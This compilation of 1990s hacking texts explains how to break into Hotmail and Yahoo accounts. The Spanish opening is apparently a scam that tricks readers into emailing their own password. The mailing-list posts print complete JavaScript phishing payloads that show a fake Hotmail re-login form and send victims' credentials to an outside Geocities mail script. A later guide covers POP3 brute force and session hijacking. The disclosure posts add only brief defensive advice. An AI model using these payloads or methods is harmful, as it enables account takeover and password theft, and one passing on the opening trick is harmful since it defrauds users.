Como Hackear Hotmail y Yahoo:
1- Lo primero que necesitas es conocer la cuenta en Hotmail de tu
victima. (Si no sabes que es el HotMail, eres un lammer. Dedicate
a otra cosa. :) )
2- Hotmail tiene
un autorespondedor que permite a quienes han olvidado su clave
(¿existirá gente tan imbécil?) y tienen otra cuenta en Hotmail
pedir que le envien su password a esa otra cuenta.
¿Entiendes?
Por
ejemplo:
Tu tienes dos cuentas:
[email protected] y [email protected]
Si **pìerdes** la clave de una puedes pedirle al autorespondedor
que te la envie a la otra. ¿Si? ¿Esto te da alguna idea?
3- Ahora si,
veamos como usamos esto para obtener la clave de otro:
Envía desde tu cuenta Hotmail un mail a [email protected]
En el subject debes poner la cuenta del idiota que vaz a hackear
por ejemplo:
Subject: [email protected]
Ahora ¿Como
comprueba el autorespondedor que en verdad erez tu? Muy simple
DEBEZ PONER EN EL CUERPO DEL MENSAJE EL EMAIL Y EL PASSWORD DE TU
CUENTA, ES DECIR, LA QUE ESTAS USANDO PARA ENVIAR ESE MAIL.
¿ENTIENDES? Ej: [email protected]:password
ATENCIÓN: No pongas nada más ni en el subject ni el cuerpo del
mensaje porque el autorespondedor no lo entenderá e ignorará tu
mail.
4- A los pocos
minutos chekeas tu mail y ¡voilá! Tenemos la password del
lammer para abuzarnoz de la mizma. A veces tarda un par de horas
porque el autorespondedor está muy ocupado o por quien sabe que
mierda. Tene un poco de paciencia porque vale la pena.
Como hackear Yahoo
El sistema es el
mismo pero tienez que tener en cuenta lo siguiente:
1- El mail debez
enviarlo a [email protected]
2- En el cuerpo
del mensaje debes poner tu dirección de Yahoo, poner dos puntos
y la clave :
hacker@yahoo:password
Recuerda que en el subject debe ir la dirección de yahoo del
lammer que quieres hackear.
Que os lo paseis bien con este simple pero efectivo truco, ByE
ScAnNeR
Hotmail Hack 1
Date: Wed, 26 Aug 1998 18:21:40 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail
Dear all.
I've got some e-mail-requests concerning my "second"
version of the
"hotmail flaw", so I've decided to post the code. This
has been tested on
IE 4.0 > and Netscape 3.0 >.
The code attached should be inserted into the mail that is sent
to the
victim.
Remember. I may NOT be responsible for any of your actions, when
implementing the contents of the attached file etc.
Thankyou.
Regards
[uudecoded file below]
<html>
<meta http-equiv="refresh" content="1;
url=http://www.because-we-can.com/hotmail/default.htm">
<head></head><body>
<P>Hotmail flaw. (second version)
<script>
errurl="http://http://www.because-we-can.com/hotmail/default.htm";
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href=errurl;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href=errurl;
}
</script>
</body>
</html>
Hotmail Hack 2
The Hotmail Hack
by Gecko321
(more details added by kM)
===========
==HOW TO==
===========
//////////
step 1
\\\\\\\\\\
Enter the hotmail ID you want to hack. (remember this) this hack
attempt ONLY
works if the user has not LOGGED out of hotmail. If the user has
logged out this attempt
will not be successful and you will get a message saying you were
logged out.
Type in the user name here
Make sure you have typed the username exactly right because
hotmail will
not tell you if you have typed it incorrectly, they also log the
IP's of
people entering incorrect login names.
//////////
step 2
\\\\\\\\\\
It is now time to view the html source code of the password page
that you are
on now. View the source for this page. Five lines down or so from
the top
of the source code page, it will say
<FORM name="passwordform"
Action="http://somenumber/cgi-bin//start/username/anothernumber"
method="POST"
target="_top">
//////////
step 3
\\\\\\\\\\
Goto the address in the action part of this code.
http://somenumber/cgi-bin//start/username/anothernumber
If the hotmail user didn't logout, you will have access to their
mailbox.
If they logged out try another. =]
Some More Hotmail hacking Stuff and Tipz
Date: Mon, 24 Aug 1998 14:21:56 -0600
From: Tom Cervenka <[email protected]>
Subject: Serious Security Hole in Hotmail
We have just found a serious security hole in Microsoft's Hotmail
service (http://www.hotmail.com) which allows malicious users to
easily
steal the passwords of Hotmail users. The exploit involves
sending an
e-mail message that contains embedded javascript code. When a
Hotmail
user views the message, the javascript code forces the user to
re-login
to Hotmail. In doing so, the victim's username and password is
sent to
the malicious user by e-mail. (see
http://www.because-we-can.com/hotmail/default.htm for demo)
Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:
- delete, send, and read the victim's e--mail
- check mail on other mail servers that the victim has
configured for mail-checking
- access the victim's address book
- discover other passwords sent as confiirmation of
registration in old e-mails
- change the password of the Hotmail acccount
The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the javascript code into the
body of
an e-mail message using a standard e-mail program such as
Netscape Mail
(free). In a working demonstration and full description of this
exploit
at http://www.because-we-can.com/hotmail/default.htm, it is shown
that
even users without their own internet service provider (ISP) can
steal
an arbitrary number of Hotmail passwords by using a free
Geocities
account.
The "Hot"mail exploit is a serious security concern for
the following
reasons:
1.The malicious code runs as soon as e-mail message is viewed
2.The resources required to launch the attack are minnimal and
freely available.
3.The malicious e-mail can be sent from virtually anywhere,
including libraries,
internet cafes, or classroom terminals
4.The exploit will work with any javascript-enabled browser,
including the Microsoft
Internet Explorer and Netscape Communicator.
Both Microsoft and Hotmail have been notified that a security
problem
exists. The following information about the "Hot"Mail
exploit is being
made publicly available to speed the process of fixing the
security hole
and inform users how they can protect themselves. This
information is
also being released in the belief that when the public is aware
of
serious security problems, expedient measures are taken by
software
manufacturers to solve those problems.
---------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 07:38:14 -0400
From: Jeff Mcadams <[email protected]>
Subject: Re: Serious Security Hole in Hotmail
Thus spake Tom Cervenka
>We have just found a serious security hole in Microsoft's
Hotmail
>service (http://www.hotmail.com) which allows malicious users
to easily
>steal the passwords of Hotmail users. The exploit involves
sending an
>e-mail message that contains embedded javascript code. When a
Hotmail
>user views the message, the javascript code forces the user
to re-login
>to Hotmail. In doing so, the victim's username and password
is sent to
>the malicious user by e-mail. (see
>http://www.because-we-can.com/hotmail/default.htm for demo)
This is a variation on the Spartan Horse announced by Dan
Gregorie over
a week ago, and covered on news.com on the 14th. The Spartan
Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com articles, is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The variation is that the Spartan Horse, as design on the
www.thetopoftheworld.com site mimicks the Windows95/98
Dial-Up-Networking dialog box.
This wasn't originally sent to BUGTRAQ because it doesn't exploit
a
specific flaw in programming code in any software, like this
"Hot"Mail
exploit. Perhaps that was an oversight on Dan's and my fault, but
I
did want to set the record straight on the origination of this
idea for
Dan's sake.
--
Jeff McAdams Email: [email protected]
Head Network Administrator Voice: (502) 966-3848
IgLou Internet Services (800) 436-4456
---------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 16:31:47 -0400
From: "Jonathan A. Zdziarski - Systems Administrator"
<[email protected]>
Subject: Re: Serious Security Hole in Hotmail
it appears that hotmail put a fix in this by
s/<script>/<comment>/ or
some variation, when you view a message.
Thank you,
Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242
---------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 20:14:07 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail
Hello everybody.
I studied Mr. Cervenka's e-mail and then started to experiment.
There is a way to do this to a browser that has Javascripting
disabled.
Just put a META REFRESH tag into the htmlfile, the URL should
point to the
URL which contains the actual capturing and sending of the
password/login.
This is shown in an example below.
<html>
<meta http-equiv="refresh" content="1;
url=the-url-that-is-to-be-pointed-to">
and so on.....
Thankyou for your time.
Regards
Jonathan James
---------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING NETSCAPE 4.OX USERS
This page demonstrates how we used the "Hot"Mail
exploit with minimal
resources to steal passwords from Hotmail users. Our goal was to
show
that using only the items listed below, we could steal a victim's
Hotmail password and remain anonymous. The following version of
the
exploit has been patched by Hotmail as of Monday, August 25,
1998.
Click here to see a variation of the "Hot"Mail exploit
that works
despite Hotmail's fix.
INGREDIENTS:
* 1 Computer with Internet Access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
STEP 1:
We visited hotmail.com and registered for a free e-mail account.
We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We
chose
the username ybwc. We did not have to enter valid contact
information
during the registration process, except for an e-mail address. We
used
the e-mail address from step 1. As part of our registration, we
were
given a new free email account from Geocities
([email protected]).
STEP 3:
We opened our notepad and typed in the following text, which we
then
saved as message.htm. Line 17 contains our Geocities username
(ybwc),
from step 2.
<html><head></head><body>
<p>"Go where you want today" - Blue
Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5
width=508
height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\"
size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request"
+
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\"
size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\"
size=\"3\"
color=\"#ff0000\"><b>Time expired. Please
re-login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\"
size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get
more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td
align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\"
NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\"
NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\"
cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial,
Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"text\"
name=\"login\" size=\"16\"
maxlength=\"16\"></td><td><font
face=\"Arial, Helvetica\"
size=\"2\">Password:</font><br><input
type=\"password\"
name=\"passwd\" size=\"16\"
maxlength=\"16\"> <input
type=\"submit\"
value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2
align=center>" +
"<font face=\"Arial, Helvetica\"
size=\"3\">" +
"Return to <a
href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's
Homepage</a>." +
"</font></th></tr></table>" +
"<p><img
src=\"http://209.1.112.251/c9698.gif\" width=189
height=16
border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
STEP 4: We composed a new e-mail message to our (example) victim,
[email protected]. We inserted the file message.htm into the
e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account.
Shortly
after he viewed our message, we checked our Geocities email. We
received an e-mail message from Geocities that listed the ip
address,
username, and password of the Hotmail user [email protected]
---------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING ANY JAVASCRIPT- ENABLED
BROWSER
This page describes how users with moderate resources (web-space
with
an Internet Service Provider) can use "Hot"Mail against
users of any
javascript-enabled browser. We required no resources or special
hardware beyond what is listed below: Hotmail has issued a patch
to
the problem, however we have discovered a problem with their fix.
The
following describes how we stole passwords from Netscape
Navigator
4.0x users after Hotmail posted a fix on the morning of Monday
August
25, 1998.
INGREDIENTS:
* 1 Computer with internet access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
* web-page space
STEP 1:
We visited hotmail.com and registered for a free e-mail account.
We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We
chose
the username ybwc. We did not have to enter valid contact
information
during the registration process, except for an e-mail address. We
used
the e-mail address from step 1. As part of our registration, we
were
given a new free email account from Geocities
([email protected]).
STEP 3:
We opened out notepad and typed in the following text, which we
then
saved as getmsg.htm. Then we uploaded the file onto our
web-space.
Line 14 contains our Geocities username (ybwc), from step 2.
<html><head></head>
<body bgcolor="#ffffff" link="#000099"
vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508
height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica"
size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica"
size="3">Reason: </font>
<font face="Arial, Helvetica" size="3"
color="#ff0000"><b>Time
expired. Please re-login.</b></font><br>
<font face="Arial, Helvetica"
size="2"><a
href="http://www.hotmail.com/errormsg.html">(Get
more info
regarding error messages here)</a></font>
</td></tr>
<tr valign="middle"><td
align="center">
<FORM METHOD=POST
ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc"
target="_top">
<INPUT TYPE="hidden" NAME="next-url"
VALUE="http://www.hotmail.com">
<INPUT TYPE="hidden" NAME="subject"
VALUE="Hotmail Password">
<table cellpadding="0" cellspacing="5"
border="0">
<tr><td><font face="Arial, Helvetica"
size="2">Login
Name:</font><br><input type="text"
name="login" size="16"
maxlength="16"></td><td><font
face="Arial, Helvetica"
size="2">Password:</font><br><input
type="password" name="passwd"
size="16"
maxlength="16"> <input
type="submit"
value="Enter"></td><tr>
</table></form></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica"
size="3">Return to <a
href="http://welcome.to/www.hotmail.com"
target="_parent">Hotmail's
Homepage</a>.
</font></th></tr></table>
<p><img src="http://209.1.112.251/c9698.gif"
width=189 height=16
border=0 alt="Copyright 1996-1997">
</body></html>
STEP 4:
We opened our notepad and typed in the following text, which we
then
saved as message.htm. Line 4 contains the URL of the file
getmsg.htm
from step 3
<html><head></head><body>
<p>"Go where you want today" - Blue
Adept</p>
<img
src="javascript:errurl='http://www.because-we-can.com/users/anon/ho
tmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='
work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.doc
ument.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='wor
k';
top.work.document.links[i].href=errurl;}">
</body>
</html>
STEP 4: We composed a new e-mail message to our victim,
[email protected]*. We inserted the file message.htm into the
e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account.
Shortly
after he viewed our message, we checked our Geocities email. It
contained an e-mail message from Geocities that listed the ip
address,
username, and password of the Hotmail user [email protected]
---------------------------------------------------------------------------
HOW THE "HOT"MAIL EXPLOIT WORKS
Why does the "Hot"Mail exploit work? The security
problem lies in
Microsoft's Hotmail service itself. Hotmail makes no attempt to
filter
Javascript code from email messages, allowing malicious users to
embed
arbitrary javascript programs into their e-mail messages.
Javascript
programs do not normally constitute a security problem when they
are
used in personal web-pages. However, when javascript code is
embedded
into a Hotmail message, it can alter the properties of the
Hotmail
user-interface itself.
In the case of the exploits we describe, the javascript alters
the
properties of every link in the Hotmail interface that the user
could
click on. The links are altered so that when the user clicks on
them,
an (bogus) Hotmail message is displayed, informing the user that
they
have timed-out of their Hotmail session and must log-in again to
continue. The (bogus) time-out page also gives the user some
text-entry fields where they can type in their username and
password
to re-login. However, when the user types in their username and
password, the information is sent back to the malicious user.
In the exploits we describe, the part of the program that does
the
actual "dirty-work" of mailing the password and
username is provided
by Geocities as a (free) service to all their members. This
should not
be viewed as an oversight or problem with Geocities, since there
are
thousands of equivalent server-side mailing programs that we
could
have used in it's place.
The "Hot"Mail exploit is just one of many potentially
damaging
javascript programs that could be embedded into mail messages.
Since
javascript code in email messages can run as soon as the message
is
viewed, and can alter virtually any aspect of the user interface,
we
urge Hotmail to implement a javascript filter.
---------------------------------------------------------------------------
HOW TO PROTECT YOURSELF FROM "HOT"MAIL
Until Hotmail fixes the security problem, we suggest that Hotmail
users turn off javascript in their browsers. Even users familiar
with
our version of the exploit may be vulnerable to other javascript
programs embedded in Hotmail messages.
Netscape users can turn javascript off in their preferences (edit
/
preferences / advanced / disable javascript).
Microsoft Internet Explorer users can turn jscript off in their
preferences (view / internet options / security / custom settings
/
scripting / disable active scripting).
----------------------------------------------------------------------------------------------------------------------------
980123 2.44 PM Hotmail hack guide by SnEzE V.2.0
----------------------------------------------------------------------------------------------------------------------------
There are many ways to hack hotmail, but I´m only writing the
best ones. If these ways doesn´t work please mail me at
[email protected] and I´ll see if U have done anything
wrong or if Hotmail has changed something...
Remember that this information is for educational purposes only
and U can´t blame anybody for damage U may have caused. Also
remember that if anybody figures out that U have been watching in
his/her account, they may be very angry...
Ok, to the hacks...
Here arethe ways I like most.
____
I_1_I - Brute force hacking
a. Use telnet to connect to port 110 (Hotmail´s server)
b. Type USER and then the victim´s username
c. Type PASS and then the guess a password
d. Repeat that until U have found the correct password.
!. This is called brute force hacking and requires patience.
It´s better than trying to guess the victims password on hotmail
homepage only because it´s faster.
____
I_2_I - The Best way
a. Get the username of the victim ( It usually stands in the
adress-field )
b. Then type " www.hotmail.com/cgi-bin/start/victimsusername
"
c. U´re in!
!. This hack only work if U are on the same network or computer
as the victim and if he don´t log out.
____
I_3_I - The old way
a. Go to Hotmail´s homepage and get a account (if U don´t
already got one)
b. Log Out
c. Now type the victims username.
d. Look at the source code.
e. On the fifth row U should find "action=someadress"
d. Copy that adress and paste it into the adress-field
e.U´re in...
!. As U can see it´s a long procedure and the victim have plenty
of time to log out.
____
I_4_I - Another...
a. Go to hotmail´s homepage
b. Copy the source code.
c. Make a new html file with the same code but change method=post
to method=enter
d. "view" the page
e. Change the adress to www.hotmail.com/ (don´t press enter!)
f. Make the victim type in his username and password
g. Look in the adress-field. There you´ll see
...&password:something...
!. This is the way I use, because it lets you know the password.
( If he exits the browser U can see the password in the History
folder!
I´ve made an example of this trick that you can use at:
hem1.passagen.se/christog/index.htm. Good Luck!
READ!
Hotmail´s sysops have changed the "system" so that the
victim may log out even if U are inside his/her account. So
don´t waste U´r time!
This text comes from http://hem1.passagen.se/christog/hotmail.htm
Remember that this is V.2.0.. More will come...
